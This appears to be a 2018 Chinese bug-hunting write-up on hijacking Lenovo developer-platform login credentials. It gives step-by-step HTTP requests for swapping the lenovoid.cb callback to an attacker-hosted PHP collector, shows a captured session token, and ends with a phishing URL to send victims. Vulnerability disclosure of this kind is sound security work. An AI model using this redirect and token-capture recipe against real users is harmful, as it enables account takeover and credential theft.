[关闭]
@1kbfree 2018-10-06T18:52:04.000000Z 字数 2100 阅读 1371

联想开发者平台可劫持用户凭证

漏洞挖掘

迫于肚子太饿并且厂里砖头太烫的情况下,上天被我感动,赠送了我这么一个洞。

1、打开Url:

  1. https://siotdev.lenovo.com/developers/callback/loginout?lenovoid.wust=&lenovoid.action=uilogout&lenovoid.realm=smartlenovo.lenovo.com.cn&lenovoid.ctx=&lenovoid.lang=null&lenovoid.idreinfo=null&registType=null

image_1cibspttf1qno1qs7198j19r3sj1m.png-533.4kB

2、点击登陆后抓包,抓取的数据包如下:

  1. GET /wauthen2/gateway?lenovoid.action=uilogin&lenovoid.realm=smartlenovo.lenovo.com.cn&lenovoid.cb=https://siotdev.lenovo.com/developers/callback/usrverinfor HTTP/1.1
  2. Host: passport.lenovo.com
  3. User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. DNT: 1
  8. Referer: https://siotdev.lenovo.com/developers/callback/loginout?lenovoid.wust=&lenovoid.action=uilogout&lenovoid.realm=smartlenovo.lenovo.com.cn&lenovoid.ctx=&lenovoid.lang=null&lenovoid.idreinfo=null&registType=null
  9. Connection: close

注意数据包里的lenovoid.cb,我们将其修改为http://127.0.0.1/jc.php

image_1cibssisq1oj9uep1rs7ffk1npb13.png-100.8kB

jc.php文件的代码是:

  1. <?php
  3. // 因为是演示,所以单纯只是打印,而不是将其存储至数据库
  4. echo "<pre>";
  5. var_dump( $_GET );
  7. ?>

放包,然后会来到登陆界面

3、来到登陆界面,输入正确的账号和密码,如图

image_1cibsv05o1rtl1mhl1i953is12mu1g.png-243.8kB

4、点击登陆

image_1cibt08441m5qu4jf6auvn9a91t.png-108kB

劫持到的url是:

  1. http://127.0.0.1/jc.php?lenovoid.wust=ZAgAAAAAAAGE9MTAxMjM5MjQ3MDkmYj0xJmM9NCZkPTU0JmU9RTA2NTk2ODgyQUM5REJDQzJFRkEwRjRGMTdBMTM1OUMxJmg9MTUzMTU1NTMyMzAyMCZpPTQzMjAwJmlsPWNuUyemHn1Kqq62f-5uTRI69A&lenovoid.action=uilogin&lenovoid.realm=smartlenovo.lenovo.com.cn&lenovoid.ctx=&lenovoid.lang=null&lenovoid.idreinfo=null&registType=null

127.0.0.1/jc.php?修改为https://siotdev.lenovo.com/developers/callback/usrverinfor?

  1. https://siotdev.lenovo.com/developers/callback/usrverinfor
  2. ?lenovoid.wust=ZAgAAAAAAAGE9MTAxMjM5MjQ3MDkmYj0xJmM9NCZkPTU0JmU9RTA2NTk2ODgyQUM5REJDQzJFRkEwRjRGMTdBMTM1OUMxJmg9MTUzMTU1NTMyMzAyMCZpPTQzMjAwJmlsPWNuUyemHn1Kqq62f-5uTRI69A
  3. &lenovoid.action=uilogin
  4. &lenovoid.realm=smartlenovo.lenovo.com.cn
  5. &lenovoid.ctx=
  6. &lenovoid.lang=null
  7. &lenovoid.idreinfo=null
  8. &registType=null

image_1cibt5169oqqm91rc21u6e188h2a.png-130.2kB

所以我们只需要诱惑用户打开如下url:

  1. passport.lenovo.com/wauthen2/gateway?lenovoid.action=uilogin&lenovoid.realm=smartlenovo.lenovo.com.cn&lenovoid.cb=http://127.0.0.1/jc.php

这里假设127.0.0.1是我网站的域名即可,当用户打开这个url并且输入正确的密码后,我就可以成功获取到他的登陆凭证~

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注